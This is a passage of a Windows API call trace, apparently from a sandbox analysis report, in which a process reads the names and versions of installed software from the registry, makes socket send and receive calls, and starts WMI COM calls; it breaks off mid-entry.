[0215.388] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x14) returned 0x0 [0215.388] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2462438, lpcbData=0x36f2d0*=0x14 | out: lpType=0x36f2d4*=0x1, lpData="8.0.61001", lpcbData=0x36f2d0*=0x14) returned 0x0 [0215.388] RegCloseKey (hKey=0x358) returned 0x0 [0215.388] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{90160000-008C-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.388] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x5e) returned 0x0 [0215.388] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2462780, lpcbData=0x36f2d0*=0x5e | out: lpType=0x36f2d4*=0x1, lpData="Office 16 Click-to-Run Extensibility Component", lpcbData=0x36f2d0*=0x5e) returned 0x0 [0215.388] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x1e) returned 0x0 [0215.388] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x24628ac, lpcbData=0x36f2d0*=0x1e | out: lpType=0x36f2d4*=0x1, lpData="16.0.4266.1003", lpcbData=0x36f2d0*=0x1e) returned 0x0 [0215.389] RegCloseKey (hKey=0x358) returned 0x0 [0215.389] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{90160000-008C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.389] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x5c) returned 0x0 [0215.389] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2462c6c, lpcbData=0x36f2d0*=0x5c | out: lpType=0x36f2d4*=0x1, lpData="Office 16 Click-to-Run Localization Component", lpcbData=0x36f2d0*=0x5c) returned 0x0 [0215.389] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x1e) returned 0x0 [0215.389] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2462d90, lpcbData=0x36f2d0*=0x1e | out: lpType=0x36f2d4*=0x1, lpData="16.0.4266.1003", lpcbData=0x36f2d0*=0x1e) returned 0x0 [0215.389] RegCloseKey (hKey=0x358) returned 0x0 [0215.390] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.390] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x68) returned 0x0 [0215.390] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2463118, lpcbData=0x36f2d0*=0x68 | out: lpType=0x36f2d4*=0x1, lpData="Update for Microsoft .NET Framework 4.8 (KB4503575)", lpcbData=0x36f2d0*=0x68) returned 0x0 [0215.390] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x4) returned 0x0 [0215.390] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2463254, lpcbData=0x36f2d0*=0x4 | out: lpType=0x36f2d4*=0x1, lpData="1", lpcbData=0x36f2d0*=0x4) returned 0x0 [0215.390] RegCloseKey (hKey=0x358) returned 0x0 [0215.391] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.391] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x7e) returned 0x0 [0215.391] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x246358c, lpcbData=0x36f2d0*=0x7e | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpcbData=0x36f2d0*=0x7e) returned 0x0 [0215.391] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x1e) returned 0x0 [0215.392] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x24636f8, lpcbData=0x36f2d0*=0x1e | out: lpType=0x36f2d4*=0x1, lpData="9.0.30729.6161", lpcbData=0x36f2d0*=0x1e) returned 0x0 [0215.392] RegCloseKey (hKey=0x358) returned 0x0 [0215.392] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.392] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x7c) returned 0x0 [0215.392] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2463a8c, lpcbData=0x36f2d0*=0x7c | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpcbData=0x36f2d0*=0x7c) returned 0x0 [0215.392] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x16) returned 0x0 [0215.392] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2463bf0, lpcbData=0x36f2d0*=0x16 | out: lpType=0x36f2d4*=0x1, lpData="11.0.61030", lpcbData=0x36f2d0*=0x16) returned 0x0 [0215.392] RegCloseKey (hKey=0x358) returned 0x0 [0215.393] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.393] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x76) returned 0x0 [0215.393] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2463f6c, lpcbData=0x36f2d0*=0x76 | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpcbData=0x36f2d0*=0x76) returned 0x0 [0215.393] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x16) returned 0x0 [0215.393] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x24640c8, lpcbData=0x36f2d0*=0x16 | out: lpType=0x36f2d4*=0x1, lpData="11.0.61030", lpcbData=0x36f2d0*=0x16) returned 0x0 [0215.393] RegCloseKey (hKey=0x358) returned 0x0 [0215.393] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.394] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x7a) returned 0x0 [0215.394] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x246443c, lpcbData=0x36f2d0*=0x7a | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpcbData=0x36f2d0*=0x7a) returned 0x0 [0215.394] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x1a) returned 0x0 [0215.394] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x24645a0, lpcbData=0x36f2d0*=0x1a | out: lpType=0x36f2d4*=0x1, lpData="11.0.61030.0", lpcbData=0x36f2d0*=0x1a) returned 0x0 [0215.394] RegCloseKey (hKey=0x358) returned 0x0 [0215.394] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.394] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x7a) returned 0x0 [0215.394] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2464924, lpcbData=0x36f2d0*=0x7a | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpcbData=0x36f2d0*=0x7a) returned 0x0 [0215.395] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x1a) returned 0x0 [0215.395] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2464a88, lpcbData=0x36f2d0*=0x1a | out: lpType=0x36f2d4*=0x1, lpData="12.0.30501.0", lpcbData=0x36f2d0*=0x1a) returned 0x0 [0215.395] RegCloseKey (hKey=0x358) returned 0x0 [0215.395] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.395] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x78) returned 0x0 [0215.395] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2464e0c, lpcbData=0x36f2d0*=0x78 | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpcbData=0x36f2d0*=0x78) returned 0x0 [0215.395] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x16) returned 0x0 [0215.395] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2464f68, lpcbData=0x36f2d0*=0x16 | out: lpType=0x36f2d4*=0x1, lpData="10.0.40219", lpcbData=0x36f2d0*=0x16) returned 0x0 [0215.396] RegCloseKey (hKey=0x358) returned 0x0 [0215.396] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.396] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.396] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.396] RegCloseKey (hKey=0x358) returned 0x0 [0215.396] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.397] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.397] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.397] RegCloseKey (hKey=0x358) returned 0x0 [0215.397] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.397] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.397] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.398] RegCloseKey (hKey=0x358) returned 0x0 [0215.447] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.447] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.447] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.447] RegCloseKey (hKey=0x358) returned 0x0 [0215.447] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.448] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.448] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.448] RegCloseKey (hKey=0x358) returned 0x0 [0215.448] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.448] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.448] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.448] RegCloseKey (hKey=0x358) returned 0x0 [0215.449] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.449] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.449] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.449] RegCloseKey (hKey=0x358) returned 0x0 [0215.449] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.449] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x7c) returned 0x0 [0215.449] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2466028, lpcbData=0x36f2d0*=0x7c | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpcbData=0x36f2d0*=0x7c) returned 0x0 [0215.450] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x16) returned 0x0 [0215.450] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x246618c, lpcbData=0x36f2d0*=0x16 | out: lpType=0x36f2d4*=0x1, lpData="12.0.21005", lpcbData=0x36f2d0*=0x16) returned 0x0 [0215.450] RegCloseKey (hKey=0x358) returned 0x0 [0215.450] RegCloseKey (hKey=0x354) returned 0x0 [0215.462] CoCreateGuid (in: pguid=0x36efbc | out: pguid=0x36efbc*(Data1=0x2b0c6e9e, Data2=0xe26d, Data3=0x47da, Data4=([0]=0xab, [1]=0x3b, [2]=0xdc, [3]=0x78, [4]=0xba, [5]=0xad, [6]=0xe3, [7]=0x3e))) returned 0x0 [0215.462] CoCreateGuid (in: pguid=0x36ef00 | out: pguid=0x36ef00*(Data1=0x3b195ff7, Data2=0x9ec5, Data3=0x4eb8, Data4=([0]=0xb5, [1]=0x9e, [2]=0x1a, [3]=0xae, [4]=0xb6, [5]=0x5d, [6]=0x70, [7]=0x92))) returned 0x0 [0215.463] send (s=0x264, buf=0x2466bd3*, len=1537, flags=0) returned 1537 [0215.464] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 125 [0215.544] CoCreateGuid (in: pguid=0x36efbc | out: pguid=0x36efbc*(Data1=0xb0cfd451, Data2=0xe627, Data3=0x463a, Data4=([0]=0x9d, [1]=0xd0, [2]=0xdf, [3]=0xce, [4]=0x8d, [5]=0x0, [6]=0x3e, [7]=0x32))) returned 0x0 [0215.544] CoCreateGuid (in: pguid=0x36ef00 | out: pguid=0x36ef00*(Data1=0xeae757e8, Data2=0x526, Data3=0x43c5, Data4=([0]=0xa3, [1]=0x3e, [2]=0x65, [3]=0x4e, [4]=0xa4, [5]=0x5b, [6]=0x94, [7]=0x20))) returned 0x0 [0215.544] send (s=0x264, buf=0x2466bd3*, len=171, flags=0) returned 171 [0215.545] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 125 [0215.602] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f278 | out: ppv=0x36f278*=0x6ee4bc) returned 0x0 [0215.602] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f270 | out: pAptType=0x36f270*=1) returned 0x0 [0215.602] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f274 | out: ppvObject=0x36f274*=0x0) returned 0x80004002 [0215.602] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0215.603] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ebe0 | out: ppv=0x36ebe0*=0x7694e8) returned 0x0 [0215.603] WbemDefPath:IUnknown:QueryInterface (in: This=0x7694e8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36edf8 | out: ppvObject=0x36edf8*=0x0) returned 0x80004002 [0215.604] WbemDefPath:IClassFactory:CreateInstance (in: This=0x7694e8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ee04 | out: ppvObject=0x36ee04*=0x768dd8) returned 0x0 [0215.604] WbemDefPath:IUnknown:Release (This=0x7694e8) returned 0x0 [0215.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea24 | out: ppvObject=0x36ea24*=0x768dd8) returned 0x0 [0215.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e9d8 | out: ppvObject=0x36e9d8*=0x0) returned 0x80004002 [0215.604] WbemDefPath:IUnknown:AddRef (This=0x768dd8) returned 0x3 [0215.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e334 | out: ppvObject=0x36e334*=0x0) returned 0x80004002 [0215.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e2e4 | out: ppvObject=0x36e2e4*=0x0) returned 0x80004002 [0215.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e2f0 | out: ppvObject=0x36e2f0*=0x7693e8) returned 0x0 [0215.604] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7693e8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e2f8 | out: pCid=0x36e2f8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0215.604] WbemDefPath:IUnknown:Release (This=0x7693e8) returned 0x3 [0215.604] CoGetContextToken (in: pToken=0x36e350 | out: pToken=0x36e350) returned 0x0 [0215.604] CoGetContextToken (in: pToken=0x36e764 | out: pToken=0x36e764) returned 0x0 [0215.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e7e4 | out: ppvObject=0x36e7e4*=0x0) returned 0x80004002 [0215.605] WbemDefPath:IUnknown:Release (This=0x768dd8) returned 0x2 [0215.605] WbemDefPath:IUnknown:Release (This=0x768dd8) returned 0x1 [0215.605] CoGetContextToken (in: pToken=0x36f0fc | out: pToken=0x36f0fc) returned 0x0 [0215.605] CoGetContextToken (in: pToken=0x36f05c | out: pToken=0x36f05c) returned 0x0 [0215.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x36f12c*(Data1=0x3bc15af2, Data2=0x736c, 